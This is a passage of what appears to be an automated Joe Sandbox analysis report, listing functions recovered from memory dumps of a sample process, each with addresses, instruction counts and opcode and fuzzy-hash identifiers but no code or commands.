                                                                                                                  • Opcode ID: 3e70b87af47674a1d5e4f32cca42391052a918828681cf7d9fc1937a5f0e772b
                                                                                                                  • Instruction ID: 4df7993091386ed2738ca3a56ecf3fc2d282293d81d94c56b6f19377965ca958
                                                                                                                  • Opcode Fuzzy Hash: 3e70b87af47674a1d5e4f32cca42391052a918828681cf7d9fc1937a5f0e772b
                                                                                                                  • Instruction Fuzzy Hash: 1251D636B0C6554FE721ABAC98A72EA3BA4EF47321F0801B6D54CD7183DE78684596C2
                                                                                                                  Function 00007FFD34880D78 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88430e2872405b040964f07c3046d503681042ee69b9400cc35aa6602a2b35e5
                                                                                                                  • Instruction ID: 3c6931c7b06134421a5a0f76061da39bc4f7330df23f82ee55cec4aab2cf80ec
                                                                                                                  • Opcode Fuzzy Hash: 88430e2872405b040964f07c3046d503681042ee69b9400cc35aa6602a2b35e5
                                                                                                                  • Instruction Fuzzy Hash: C851D672A1878A4FE795DBA888B53A97FE2FF96300F4540BAD04DD72D2CE782805C740
                                                                                                                  Function 00007FFD348AA3E8 Relevance: .2, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f92cf2833e1f9b0938a20a4d2621c1015dd1a95efc54cba4b4b373384803a81e
                                                                                                                  • Instruction ID: a38bdd21c77a70a60dfa2b8512c13e1a9e295b00fe9d764a99dced19add6a960
                                                                                                                  • Opcode Fuzzy Hash: f92cf2833e1f9b0938a20a4d2621c1015dd1a95efc54cba4b4b373384803a81e
                                                                                                                  • Instruction Fuzzy Hash: 2D413726B095555BD212BBFCB8B20EA77A4DF4232DB4C13B2D19CCB083FD79205A8295
                                                                                                                  Function 00007FFD3488090D Relevance: .2, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0cbceaf423dc71d2ef1098e0abc13815ad071b2fe7dd3b2fd1e14bda0d3bf79a
                                                                                                                  • Instruction ID: 49206ac1864d45967fd2ac0db96ea0d93e278dfc03cb4661c647ea72fc3e48e5
                                                                                                                  • Opcode Fuzzy Hash: 0cbceaf423dc71d2ef1098e0abc13815ad071b2fe7dd3b2fd1e14bda0d3bf79a
                                                                                                                  • Instruction Fuzzy Hash: 19412512B0C9551FE754B7FC60BA6F97795EF8A320B0849BBD04DC7193DD28A8818280
                                                                                                                  Function 00007FFD348A95EC Relevance: .2, Instructions: 152COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: abc5d74662a1ac53c790a6a816a8275d6c8b3c7702d452744a454c87e8a84a26
                                                                                                                  • Instruction ID: 5c750405cf07ffdeebd51b6fb3c1be81aa706e628411702bdb624051e24b217e
                                                                                                                  • Opcode Fuzzy Hash: abc5d74662a1ac53c790a6a816a8275d6c8b3c7702d452744a454c87e8a84a26
                                                                                                                  • Instruction Fuzzy Hash: C7419F31B189098FDB94EF68C4A46A973E2FF98310F540679D11ED3691DB38E8828B90
                                                                                                                  Function 00007FFD348808E8 Relevance: .1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction ID: 8652c006c93b782a3801aa2f9c5a4a1185cc1f841d54c68a3ccf35deb99ca974
                                                                                                                  • Opcode Fuzzy Hash: b6456d485d7d247cc7f77abaa4a331c8dd7de4e7ae6363fe8f4e46c5cf00cc56
                                                                                                                  • Instruction Fuzzy Hash: 3231F73130C9194FD768EB5CE89A9B977D0EF4632130501BBE58AC7166D911EC828782
                                                                                                                  Function 00007FFD34880960 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b9ecabe0329433efd96a451ffda02fc243b2628ce5c1e69a1b6438a958d5d0b6
                                                                                                                  • Instruction ID: 71a5c947404358e3256cee76ce30c979c2b23ede50616a786bb63143082f1420
                                                                                                                  • Opcode Fuzzy Hash: b9ecabe0329433efd96a451ffda02fc243b2628ce5c1e69a1b6438a958d5d0b6
                                                                                                                  • Instruction Fuzzy Hash: A631E712B1C9191FE794B3BC64BA6F963C6DF89321B18447AE40DC32D3DD38AC814284
                                                                                                                  Function 00007FFD348B2A91 Relevance: .1, Instructions: 107COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7c40c1bccd88c1e68154aee766facb1f4914f08c673b160a7f848ca3b014e32a
                                                                                                                  • Instruction ID: 0cc0bfff8c6d8ab896a02575dc2395a04e4d7a8397d4dee362eab0308defac94
                                                                                                                  • Opcode Fuzzy Hash: 7c40c1bccd88c1e68154aee766facb1f4914f08c673b160a7f848ca3b014e32a
                                                                                                                  • Instruction Fuzzy Hash: 27310832B0C9494FEB65EB18C8697E537D1EB96310F0402BBD44DD72C2DE686C4587C1
                                                                                                                  Function 00007FFD34880998 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ebe9285944bf4ccb734a531343d0fe6932c7e7c3f780becdad6a6fbf77e00046
                                                                                                                  • Instruction ID: 46df3edf82dd2d7e825e8b800eda463dc05d10d050bd7868a4bfd5a0bfd43534
                                                                                                                  • Opcode Fuzzy Hash: ebe9285944bf4ccb734a531343d0fe6932c7e7c3f780becdad6a6fbf77e00046
                                                                                                                  • Instruction Fuzzy Hash: A5210B21B689590FE798F76C54BE6B577C6EF9D311B5404B9E40DC32D3DD28AC418280
                                                                                                                  Function 00007FFD3488119D Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cd0ecda2639163395a500337627962ca1540a649fede3de0b5faa15b4d2f5ec
                                                                                                                  • Instruction ID: 1adebb6184b79c33ef9780becc06f4045777fca1f124e4f6337cd53d57c82be0
                                                                                                                  • Opcode Fuzzy Hash: 3cd0ecda2639163395a500337627962ca1540a649fede3de0b5faa15b4d2f5ec
                                                                                                                  • Instruction Fuzzy Hash: B1317331A0964A8FDB85EB68C8A99F97BE1FF56300F0545BAC009D72A2DF28A841C740
                                                                                                                  Function 00007FFD348B2124 Relevance: .1, Instructions: 79COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0255f56277f8a7c3c453ca42a8962b80a3e1cb7a85e2f2d1333ba454944dc57
                                                                                                                  • Instruction ID: ffa54091eadd474603db5a08ea016de2d931d6c2e5645e4f0ec450f57b98748f
                                                                                                                  • Opcode Fuzzy Hash: d0255f56277f8a7c3c453ca42a8962b80a3e1cb7a85e2f2d1333ba454944dc57
                                                                                                                  • Instruction Fuzzy Hash: 2121F321B1C6168FE718AB5C986937973C1FB99708F00037DE18ED33D2DE6CA80292C6
                                                                                                                  Function 00007FFD348A5A75 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04379ab4549e5a59e235779206c895f5ac1de8bb36f10047c9a8810a3fc880b7
                                                                                                                  • Instruction ID: 467af5d97d46dbcecadcf2d00b1e123aea09cd8e83c561dffb96b63af05a98ab
                                                                                                                  • Opcode Fuzzy Hash: 04379ab4549e5a59e235779206c895f5ac1de8bb36f10047c9a8810a3fc880b7
                                                                                                                  • Instruction Fuzzy Hash: F401D621B1FE4A0FDBD9E32D44A51B4B7E1EB9B21178401BAD54EC7192ED5CACC28381
                                                                                                                  Function 00007FFD34880C25 Relevance: .1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction ID: 8d71182a12ca4557fc3a9a2e80e08b5a3de2469698398fce45db6864e7fa430c
                                                                                                                  • Opcode Fuzzy Hash: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction Fuzzy Hash: F321F336A0D3898FE712DB6898A11DD7FB0EF53320F1542B7D144DB1C2D63826069791
                                                                                                                  Function 00007FFD34880C38 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction ID: ee099f9becb69fa132d960b96461b51f5ffc9fab4e420bed93cb2536f349bccc
                                                                                                                  • Opcode Fuzzy Hash: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction Fuzzy Hash: 6911A035A0D3899FE712DBB888A11DD7FB0AF53310F0645B6C184DB192D53866059790
                                                                                                                  Function 00007FFD34880C40 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction ID: 00bd258087b8aa50fb41ec7739cd0323b6bd41a5294226edbc50420012944a7e
                                                                                                                  • Opcode Fuzzy Hash: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction Fuzzy Hash: 7611AD35A0D3888FE712DBA8C8A02DD7FB0AF53310F0645FAC584DB192D63866499781
                                                                                                                  Function 00007FFD34894126 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34890000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 039f075b9d327acd6604e723de641fc58b4e44e547a3d39b9fb42bcac8a536ff
                                                                                                                  • Instruction ID: eff30d029223622b77eed0c21e6cdcc19dc16e63689de206503cd7522ad1ea43
                                                                                                                  • Opcode Fuzzy Hash: 039f075b9d327acd6604e723de641fc58b4e44e547a3d39b9fb42bcac8a536ff
                                                                                                                  • Instruction Fuzzy Hash: 91014C71B0890A9BEB58DF84C4B46BE7BB1FF45304F14463AC51AD7294CF7869869780
                                                                                                                  Function 00007FFD34880C48 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction ID: 7ebcc64d21dcadfa3fe12408f194a45b473b2fb467ed13154613d5d822934c91
                                                                                                                  • Opcode Fuzzy Hash: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction Fuzzy Hash: 00019E35A0D3888FE712DBB8C8A029D7FB0AF43310F1941EAC544DB192D6386A459781
                                                                                                                  Function 00007FFD34880C50 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction ID: a6f4ff8580bec2c082c93793a63f7ed62790e7166e93df983d1950a6c7e0dc9f
                                                                                                                  • Opcode Fuzzy Hash: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction Fuzzy Hash: 64018F34E0D3899FE712DBB888A429D7FF0AF13310F1941EAC544DB193DA386A449781
                                                                                                                  Function 00007FFD348AD489 Relevance: .0, Instructions: 32COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 87e86ae87c6a9e1badb87847d1a17a8b1be6fbbdc9fc74a90b3f58c4b22e25dd
                                                                                                                  • Instruction ID: d4f69648199fba42d31b5ac6feb4c87e78fb80db106a0174ca8020eb0b4189af
                                                                                                                  • Opcode Fuzzy Hash: 87e86ae87c6a9e1badb87847d1a17a8b1be6fbbdc9fc74a90b3f58c4b22e25dd
                                                                                                                  • Instruction Fuzzy Hash: 31F0396191E7C45FD3229B398C664657FF0EE2721534E05EBC4CACB5B3DA5A888B8312
                                                                                                                  Function 00007FFD348B3649 Relevance: .0, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3ac6082247e88947804e329f02794f0c8ccebbad0f409dcdb317a2658abd705c
                                                                                                                  • Instruction ID: 79a2e5a64e229bfe49b6c6d3f6dd15112ec08d066abba24a2833289720f01abd
                                                                                                                  • Opcode Fuzzy Hash: 3ac6082247e88947804e329f02794f0c8ccebbad0f409dcdb317a2658abd705c
                                                                                                                  • Instruction Fuzzy Hash: 5AE09230709B884FC70E963888A85507FB1EF6721138942DBC005CB2A3D919DC89C751
                                                                                                                  Function 00007FFD348948C1 Relevance: .0, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34890000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction ID: 2d5fc9e48846ec678d3c575f3f40fb3ad51c740576c3f67cf6ad21f021c2ca47
                                                                                                                  • Opcode Fuzzy Hash: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction Fuzzy Hash: 43F0E530B0C94A4FE619DF0C98E05B93391EF87710F004175D51AC32D7DE3CA801A680
                                                                                                                  Function 00007FFD348AA528 Relevance: .0, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: abdb4441e20a176a8713d7505d79926f62afb7714f32f0ffd207aa39025a564d
                                                                                                                  • Instruction ID: aa66d247f7ec616b28de9ecdacc81d8e6392e9d125bbfad4226d40d1c8392798
                                                                                                                  • Opcode Fuzzy Hash: abdb4441e20a176a8713d7505d79926f62afb7714f32f0ffd207aa39025a564d
                                                                                                                  • Instruction Fuzzy Hash: D1D05E30B60A094B8B0CB62D88A8430B3D1E7AA2067945278D40BC2291ED29ECCA8B81
                                                                                                                  Function 00007FFD34883FBF Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cc1dbcfd56367301f083da3ad46f17e54c088d5b339500f8826ab87fbcf9a650
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: FAE01231B0811647F795AB54C8A07B972A1EF8A300F110078DB5DD33C5DF3CAD009745
                                                                                                                  Function 00007FFD348B2470 Relevance: .0, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                  Function 00007FFD348812E8 Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: eb51c2ef2f49df78aeef9a35f10684ed442e681ab93358b0954b3b2169bd7c28
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 3DC0123061080C8FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D62AECC2DB80
                                                                                                                  Function 00007FFD34880B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 92a19b049061f1b79014d34d758ce98f48aeec7c507c9c60df3bb14c9814b990
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: C6C0123062880E8FDA80BB28C888924BBA0FF4F301BE908E0E00CC71A1D61998908B02
                                                                                                                  Function 00007FFD348806AD Relevance: .0, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: f1bb64264544f2bb3d34ad0b68692d15da6e49be2bd9218b9f4269c231fb326f
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: B7C04C05F5B75B01A9D5736E58E60ADA2409FC7624FE31572D75CD0091AC4D20D52156
                                                                                                                  Function 00007FFD34883CD0 Relevance: .0, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d40adfab4259555daca3dcee5fc0016d430017eea9a9394dd9ef019b4f39c53e
                                                                                                                  • Instruction ID: 3da47a7ab6e4395290e458e5a191831dd0b5f26e88d097fd182c0b649738be1d
                                                                                                                  • Opcode Fuzzy Hash: d40adfab4259555daca3dcee5fc0016d430017eea9a9394dd9ef019b4f39c53e
                                                                                                                  • Instruction Fuzzy Hash: AEC04C16F1881A46F369735444725FE18565F45704F545434E10DD77CACF2C6E0116C6
                                                                                                                  Function 00007FFD348806D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
